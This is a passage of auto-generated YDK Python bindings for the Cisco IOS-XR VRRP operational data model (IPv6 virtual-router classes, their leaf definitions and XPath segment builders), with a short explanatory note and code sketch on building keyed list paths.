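Note that `fullmatch` is used rather than `match`, since the pattern must cover the whole key (a name containing a space, for instance, should be rejected).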
class VirtualRouters(_Entity_):
"""
The VRRP virtual router table
.. attribute:: virtual_router
A VRRP virtual router
**type**\: list of :py:class:`VirtualRouter <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters.VirtualRouter>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters, self).__init__()
self.yang_name = "virtual-routers"
self.yang_parent_name = "ipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("virtual-router", ("virtual_router", Vrrp.Ipv6.VirtualRouters.VirtualRouter))])
self._leafs = OrderedDict()
self.virtual_router = YList(self)
self._segment_path = lambda: "virtual-routers"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv6/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters, [], name, value)
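Each keyed list entry builds its XPath segment by appending `[key='value']` predicates, the same string construction the generated `_segment_path` lambdas use. A stdlib sketch of that construction for a `virtual-router` entry, which is keyed by `interface-name` and `virtual-router-id`; the helper `keyed_segment` is ours, and the interface name is a made-up example:

```python
def keyed_segment(list_name, keys):
    """Build "list-name[k1='v1'][k2='v2']" the way the generated _segment_path lambdas do."""
    return list_name + "".join("[%s='%s']" % (k, v) for k, v in keys)


# Absolute path for one virtual router, composed from the ancestor segment paths.
path = "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv6/virtual-routers/" + keyed_segment(
    "virtual-router",
    [("interface-name", "GigabitEthernet0/0/0/0"), ("virtual-router-id", 1)],
)
```

The resulting string is what a NETCONF/RESTCONF layer would use to address exactly one entry in the `virtual-router` list.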
class VirtualRouter(_Entity_):
"""
A VRRP virtual router
.. attribute:: interface_name (key)
The name of the interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: virtual_router_id (key)
The VRRP virtual router id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: resign_sent_time
Time last resign was sent
**type**\: :py:class:`ResignSentTime <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignSentTime>`
**config**\: False
.. attribute:: resign_received_time
Time last resign was received
**type**\: :py:class:`ResignReceivedTime <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignReceivedTime>`
**config**\: False
.. attribute:: interface_name_xr
IM Interface Name
**type**\: str
**length:** 0..64
**config**\: False
.. attribute:: virtual_router_id_xr
Virtual Router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: version
VRRP Protocol Version
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: address_family
Address family
**type**\: :py:class:`VrrpBAf <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBAf>`
**config**\: False
.. attribute:: session_name
Session Name
**type**\: str
**length:** 0..16
**config**\: False
.. attribute:: slaves
Number of slave groups following this session's state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: is_slave
Group is a slave group
**type**\: bool
**config**\: False
.. attribute:: followed_session_name
Followed Session Name
**type**\: str
**length:** 0..16
**config**\: False
.. attribute:: secondary_address_count
Configured VRRP secondary address count
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: operational_address_count
Operational VRRP address count
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: primary_virtual_ip
Configured IPv4 Primary address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: configured_down_address_count
Configured but Down VRRP address count
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: virtual_linklocal_ipv6_address
Virtual linklocal IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: primary_state
State of primary IP address
**type**\: :py:class:`VrrpVipState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpVipState>`
**config**\: False
.. attribute:: master_ip_address
Master router real IP address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: master_ipv6_address
Master router real IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: master_priority
Master router priority
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: vrrp_state
VRRP state
**type**\: :py:class:`VrrpBagProtocolState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBagProtocolState>`
**config**\: False
.. attribute:: authentication_type
Authentication type
**type**\: :py:class:`VrrpProtAuth <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpProtAuth>`
**config**\: False
.. attribute:: authentication_string
Authentication data
**type**\: str
**config**\: False
.. attribute:: configured_advertize_time
Configured advertize time
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: oper_advertize_time
Operational advertize time
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: min_delay_time
Minimum delay time in msecs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: millisecond
.. attribute:: reload_delay_time
Reload delay time in msecs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: millisecond
.. attribute:: delay_timer_flag
Delay timer running flag
**type**\: bool
**config**\: False
.. attribute:: delay_timer_secs
Delay timer running time secs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: delay_timer_msecs
Delay timer running time msecs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: millisecond
.. attribute:: authentication_flag
Text authentication configured flag
**type**\: bool
**config**\: False
.. attribute:: force_timer_flag
Configured timers forced flag
**type**\: bool
**config**\: False
.. attribute:: preempt_flag
Preempt configured flag
**type**\: bool
**config**\: False
.. attribute:: ip_address_owner_flag
IP address owner flag
**type**\: bool
**config**\: False
.. attribute:: is_accept_mode
Is accept mode
**type**\: bool
**config**\: False
.. attribute:: preempt_delay_time
Preempt delay time
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: configured_priority
Configured priority
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: operational_priority
Operational priority
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: priority_decrement
Priority decrement
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interface_count
Number of items tracked
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interface_up_count
Number of tracked items up
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_item_count
Number of tracked items
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_item_up_count
Number of tracked items in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: time_in_current_state
Time in current state secs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: state_change_count
Number of state changes
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: time_vrouter_up
Time the virtual router has been up, in centiseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: centisecond
.. attribute:: master_count
Number of times this virtual router has become Master
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: adverts_received_count
Number of advertisements received
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: advert_interval_error_count
Advertise interval errors
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: adverts_sent_count
Number of advertisements sent
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: authentication_fail_count
Authentication failures
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ttl_error_count
TTL errors
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: priority_zero_received_count
Number of priority 0 packets received
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: priority_zero_sent_count
Number of priority 0 packets sent
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_packet_count
Invalid packets received
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: address_list_error_count
Address list errors
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_auth_type_count
Invalid authentication type
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: auth_type_mismatch_count
Authentication type mismatches
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_length_errors_count
Packet length errors
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: time_stats_discontinuity
Time since a statistics discontinuity in ticks (10ns units)
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_session_state
BFD session state
**type**\: :py:class:`VrrpBfdSessionState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBfdSessionState>`
**config**\: False
.. attribute:: bfd_interval
BFD packet send interval
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_multiplier
BFD multiplier
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_cfg_remote_ip
BFD configured remote IP
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: bfd_configured_remote_ipv6_address
BFD configured remote IPv6
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: state_from_checkpoint
Whether state recovered from checkpoint
**type**\: bool
**config**\: False
.. attribute:: interface_ipv4_address
The Interface Primary IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: interface_ipv6_address
The Interface linklocal IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: virtual_mac_address
Virtual mac address
**type**\: str
**pattern:** [0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2}){5}
**config**\: False
.. attribute:: virtual_mac_address_state
Virtual mac address state
**type**\: :py:class:`VrrpVmacState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpVmacState>`
**config**\: False
.. attribute:: operational_address
Operational IPv4 VRRP addresses
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv4_configured_down_address
IPv4 Configured but Down VRRP addresses
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_operational_address
IPv6 Operational VRRP addresses
**type**\: list of :py:class:`Ipv6OperationalAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6OperationalAddress>`
**config**\: False
.. attribute:: ipv6_configured_down_address
IPv6 Configured but Down VRRP addresses
**type**\: list of :py:class:`Ipv6ConfiguredDownAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress>`
**config**\: False
.. attribute:: track_item_info
Track Item Info
**type**\: list of :py:class:`TrackItemInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters.VirtualRouter.TrackItemInfo>`
**config**\: False
.. attribute:: state_change_history
State change history
**type**\: list of :py:class:`StateChangeHistory <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters.VirtualRouter, self).__init__()
self.yang_name = "virtual-router"
self.yang_parent_name = "virtual-routers"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['interface_name','virtual_router_id']
self._child_classes = OrderedDict([("resign-sent-time", ("resign_sent_time", Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignSentTime)), ("resign-received-time", ("resign_received_time", Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignReceivedTime)), ("ipv6-operational-address", ("ipv6_operational_address", Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6OperationalAddress)), ("ipv6-configured-down-address", ("ipv6_configured_down_address", Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress)), ("track-item-info", ("track_item_info", Vrrp.Ipv6.VirtualRouters.VirtualRouter.TrackItemInfo)), ("state-change-history", ("state_change_history", Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory))])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('virtual_router_id', (YLeaf(YType.uint32, 'virtual-router-id'), ['int'])),
('interface_name_xr', (YLeaf(YType.str, 'interface-name-xr'), ['str'])),
('virtual_router_id_xr', (YLeaf(YType.uint32, 'virtual-router-id-xr'), ['int'])),
('version', (YLeaf(YType.uint8, 'version'), ['int'])),
('address_family', (YLeaf(YType.enumeration, 'address-family'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBAf', '')])),
('session_name', (YLeaf(YType.str, 'session-name'), ['str'])),
('slaves', (YLeaf(YType.uint32, 'slaves'), ['int'])),
('is_slave', (YLeaf(YType.boolean, 'is-slave'), ['bool'])),
('followed_session_name', (YLeaf(YType.str, 'followed-session-name'), ['str'])),
('secondary_address_count', (YLeaf(YType.uint8, 'secondary-address-count'), ['int'])),
('operational_address_count', (YLeaf(YType.uint8, 'operational-address-count'), ['int'])),
('primary_virtual_ip', (YLeaf(YType.str, 'primary-virtual-ip'), ['str'])),
('configured_down_address_count', (YLeaf(YType.uint8, 'configured-down-address-count'), ['int'])),
('virtual_linklocal_ipv6_address', (YLeaf(YType.str, 'virtual-linklocal-ipv6-address'), ['str'])),
('primary_state', (YLeaf(YType.enumeration, 'primary-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpVipState', '')])),
('master_ip_address', (YLeaf(YType.str, 'master-ip-address'), ['str'])),
('master_ipv6_address', (YLeaf(YType.str, 'master-ipv6-address'), ['str'])),
('master_priority', (YLeaf(YType.uint8, 'master-priority'), ['int'])),
('vrrp_state', (YLeaf(YType.enumeration, 'vrrp-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBagProtocolState', '')])),
('authentication_type', (YLeaf(YType.enumeration, 'authentication-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpProtAuth', '')])),
('authentication_string', (YLeaf(YType.str, 'authentication-string'), ['str'])),
('configured_advertize_time', (YLeaf(YType.uint32, 'configured-advertize-time'), ['int'])),
('oper_advertize_time', (YLeaf(YType.uint32, 'oper-advertize-time'), ['int'])),
('min_delay_time', (YLeaf(YType.uint32, 'min-delay-time'), ['int'])),
('reload_delay_time', (YLeaf(YType.uint32, 'reload-delay-time'), ['int'])),
('delay_timer_flag', (YLeaf(YType.boolean, 'delay-timer-flag'), ['bool'])),
('delay_timer_secs', (YLeaf(YType.uint32, 'delay-timer-secs'), ['int'])),
('delay_timer_msecs', (YLeaf(YType.uint32, 'delay-timer-msecs'), ['int'])),
('authentication_flag', (YLeaf(YType.boolean, 'authentication-flag'), ['bool'])),
('force_timer_flag', (YLeaf(YType.boolean, 'force-timer-flag'), ['bool'])),
('preempt_flag', (YLeaf(YType.boolean, 'preempt-flag'), ['bool'])),
('ip_address_owner_flag', (YLeaf(YType.boolean, 'ip-address-owner-flag'), ['bool'])),
('is_accept_mode', (YLeaf(YType.boolean, 'is-accept-mode'), ['bool'])),
('preempt_delay_time', (YLeaf(YType.uint16, 'preempt-delay-time'), ['int'])),
('configured_priority', (YLeaf(YType.uint8, 'configured-priority'), ['int'])),
('operational_priority', (YLeaf(YType.uint8, 'operational-priority'), ['int'])),
('priority_decrement', (YLeaf(YType.uint32, 'priority-decrement'), ['int'])),
('tracked_interface_count', (YLeaf(YType.uint32, 'tracked-interface-count'), ['int'])),
('tracked_interface_up_count', (YLeaf(YType.uint32, 'tracked-interface-up-count'), ['int'])),
('tracked_item_count', (YLeaf(YType.uint32, 'tracked-item-count'), ['int'])),
('tracked_item_up_count', (YLeaf(YType.uint32, 'tracked-item-up-count'), ['int'])),
('time_in_current_state', (YLeaf(YType.uint32, 'time-in-current-state'), ['int'])),
('state_change_count', (YLeaf(YType.uint32, 'state-change-count'), ['int'])),
('time_vrouter_up', (YLeaf(YType.uint32, 'time-vrouter-up'), ['int'])),
('master_count', (YLeaf(YType.uint32, 'master-count'), ['int'])),
('adverts_received_count', (YLeaf(YType.uint32, 'adverts-received-count'), ['int'])),
('advert_interval_error_count', (YLeaf(YType.uint32, 'advert-interval-error-count'), ['int'])),
('adverts_sent_count', (YLeaf(YType.uint32, 'adverts-sent-count'), ['int'])),
('authentication_fail_count', (YLeaf(YType.uint32, 'authentication-fail-count'), ['int'])),
('ttl_error_count', (YLeaf(YType.uint32, 'ttl-error-count'), ['int'])),
('priority_zero_received_count', (YLeaf(YType.uint32, 'priority-zero-received-count'), ['int'])),
('priority_zero_sent_count', (YLeaf(YType.uint32, 'priority-zero-sent-count'), ['int'])),
('invalid_packet_count', (YLeaf(YType.uint32, 'invalid-packet-count'), ['int'])),
('address_list_error_count', (YLeaf(YType.uint32, 'address-list-error-count'), ['int'])),
('invalid_auth_type_count', (YLeaf(YType.uint32, 'invalid-auth-type-count'), ['int'])),
('auth_type_mismatch_count', (YLeaf(YType.uint32, 'auth-type-mismatch-count'), ['int'])),
('pkt_length_errors_count', (YLeaf(YType.uint32, 'pkt-length-errors-count'), ['int'])),
('time_stats_discontinuity', (YLeaf(YType.uint32, 'time-stats-discontinuity'), ['int'])),
('bfd_session_state', (YLeaf(YType.enumeration, 'bfd-session-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBfdSessionState', '')])),
('bfd_interval', (YLeaf(YType.uint32, 'bfd-interval'), ['int'])),
('bfd_multiplier', (YLeaf(YType.uint32, 'bfd-multiplier'), ['int'])),
('bfd_cfg_remote_ip', (YLeaf(YType.str, 'bfd-cfg-remote-ip'), ['str'])),
('bfd_configured_remote_ipv6_address', (YLeaf(YType.str, 'bfd-configured-remote-ipv6-address'), ['str'])),
('state_from_checkpoint', (YLeaf(YType.boolean, 'state-from-checkpoint'), ['bool'])),
('interface_ipv4_address', (YLeaf(YType.str, 'interface-ipv4-address'), ['str'])),
('interface_ipv6_address', (YLeaf(YType.str, 'interface-ipv6-address'), ['str'])),
('virtual_mac_address', (YLeaf(YType.str, 'virtual-mac-address'), ['str'])),
('virtual_mac_address_state', (YLeaf(YType.enumeration, 'virtual-mac-address-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpVmacState', '')])),
('operational_address', (YLeafList(YType.str, 'operational-address'), ['str'])),
('ipv4_configured_down_address', (YLeafList(YType.str, 'ipv4-configured-down-address'), ['str'])),
])
self.interface_name = None
self.virtual_router_id = None
self.interface_name_xr = None
self.virtual_router_id_xr = None
self.version = None
self.address_family = None
self.session_name = None
self.slaves = None
self.is_slave = None
self.followed_session_name = None
self.secondary_address_count = None
self.operational_address_count = None
self.primary_virtual_ip = None
self.configured_down_address_count = None
self.virtual_linklocal_ipv6_address = None
self.primary_state = None
self.master_ip_address = None
self.master_ipv6_address = None
self.master_priority = None
self.vrrp_state = None
self.authentication_type = None
self.authentication_string = None
self.configured_advertize_time = None
self.oper_advertize_time = None
self.min_delay_time = None
self.reload_delay_time = None
self.delay_timer_flag = None
self.delay_timer_secs = None
self.delay_timer_msecs = None
self.authentication_flag = None
self.force_timer_flag = None
self.preempt_flag = None
self.ip_address_owner_flag = None
self.is_accept_mode = None
self.preempt_delay_time = None
self.configured_priority = None
self.operational_priority = None
self.priority_decrement = None
self.tracked_interface_count = None
self.tracked_interface_up_count = None
self.tracked_item_count = None
self.tracked_item_up_count = None
self.time_in_current_state = None
self.state_change_count = None
self.time_vrouter_up = None
self.master_count = None
self.adverts_received_count = None
self.advert_interval_error_count = None
self.adverts_sent_count = None
self.authentication_fail_count = None
self.ttl_error_count = None
self.priority_zero_received_count = None
self.priority_zero_sent_count = None
self.invalid_packet_count = None
self.address_list_error_count = None
self.invalid_auth_type_count = None
self.auth_type_mismatch_count = None
self.pkt_length_errors_count = None
self.time_stats_discontinuity = None
self.bfd_session_state = None
self.bfd_interval = None
self.bfd_multiplier = None
self.bfd_cfg_remote_ip = None
self.bfd_configured_remote_ipv6_address = None
self.state_from_checkpoint = None
self.interface_ipv4_address = None
self.interface_ipv6_address = None
self.virtual_mac_address = None
self.virtual_mac_address_state = None
self.operational_address = []
self.ipv4_configured_down_address = []
self.resign_sent_time = Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignSentTime()
self.resign_sent_time.parent = self
self._children_name_map["resign_sent_time"] = "resign-sent-time"
self.resign_received_time = Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignReceivedTime()
self.resign_received_time.parent = self
self._children_name_map["resign_received_time"] = "resign-received-time"
self.ipv6_operational_address = YList(self)
self.ipv6_configured_down_address = YList(self)
self.track_item_info = YList(self)
self.state_change_history = YList(self)
self._segment_path = lambda: "virtual-router" + "[interface-name='" + str(self.interface_name) + "']" + "[virtual-router-id='" + str(self.virtual_router_id) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv6/virtual-routers/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters.VirtualRouter, ['interface_name', 'virtual_router_id', 'interface_name_xr', 'virtual_router_id_xr', 'version', 'address_family', 'session_name', 'slaves', 'is_slave', 'followed_session_name', 'secondary_address_count', 'operational_address_count', 'primary_virtual_ip', 'configured_down_address_count', 'virtual_linklocal_ipv6_address', 'primary_state', 'master_ip_address', 'master_ipv6_address', 'master_priority', 'vrrp_state', 'authentication_type', 'authentication_string', 'configured_advertize_time', 'oper_advertize_time', 'min_delay_time', 'reload_delay_time', 'delay_timer_flag', 'delay_timer_secs', 'delay_timer_msecs', 'authentication_flag', 'force_timer_flag', 'preempt_flag', 'ip_address_owner_flag', 'is_accept_mode', 'preempt_delay_time', 'configured_priority', 'operational_priority', 'priority_decrement', 'tracked_interface_count', 'tracked_interface_up_count', 'tracked_item_count', 'tracked_item_up_count', 'time_in_current_state', 'state_change_count', 'time_vrouter_up', 'master_count', 'adverts_received_count', 'advert_interval_error_count', 'adverts_sent_count', 'authentication_fail_count', 'ttl_error_count', 'priority_zero_received_count', 'priority_zero_sent_count', 'invalid_packet_count', 'address_list_error_count', 'invalid_auth_type_count', 'auth_type_mismatch_count', 'pkt_length_errors_count', 'time_stats_discontinuity', 'bfd_session_state', 'bfd_interval', 'bfd_multiplier', 'bfd_cfg_remote_ip', 'bfd_configured_remote_ipv6_address', 'state_from_checkpoint', 'interface_ipv4_address', 'interface_ipv6_address', 'virtual_mac_address', 'virtual_mac_address_state', 'operational_address', 'ipv4_configured_down_address'], name, value)
class ResignSentTime(_Entity_):
"""
Time last resign was sent
.. attribute:: seconds
Seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: nanoseconds
Nanoseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: nanosecond
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignSentTime, self).__init__()
self.yang_name = "resign-sent-time"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('seconds', (YLeaf(YType.uint32, 'seconds'), ['int'])),
('nanoseconds', (YLeaf(YType.uint32, 'nanoseconds'), ['int'])),
])
self.seconds = None
self.nanoseconds = None
self._segment_path = lambda: "resign-sent-time"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignSentTime, ['seconds', 'nanoseconds'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignSentTime']['meta_info']
class ResignReceivedTime(_Entity_):
"""
Time last resign was received
.. attribute:: seconds
Seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: nanoseconds
Nanoseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: nanosecond
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignReceivedTime, self).__init__()
self.yang_name = "resign-received-time"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('seconds', (YLeaf(YType.uint32, 'seconds'), ['int'])),
('nanoseconds', (YLeaf(YType.uint32, 'nanoseconds'), ['int'])),
])
self.seconds = None
self.nanoseconds = None
self._segment_path = lambda: "resign-received-time"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignReceivedTime, ['seconds', 'nanoseconds'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignReceivedTime']['meta_info']
class Ipv6OperationalAddress(_Entity_):
"""
IPv6 Operational VRRP addresses
.. attribute:: ipv6_address
IPV6Address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
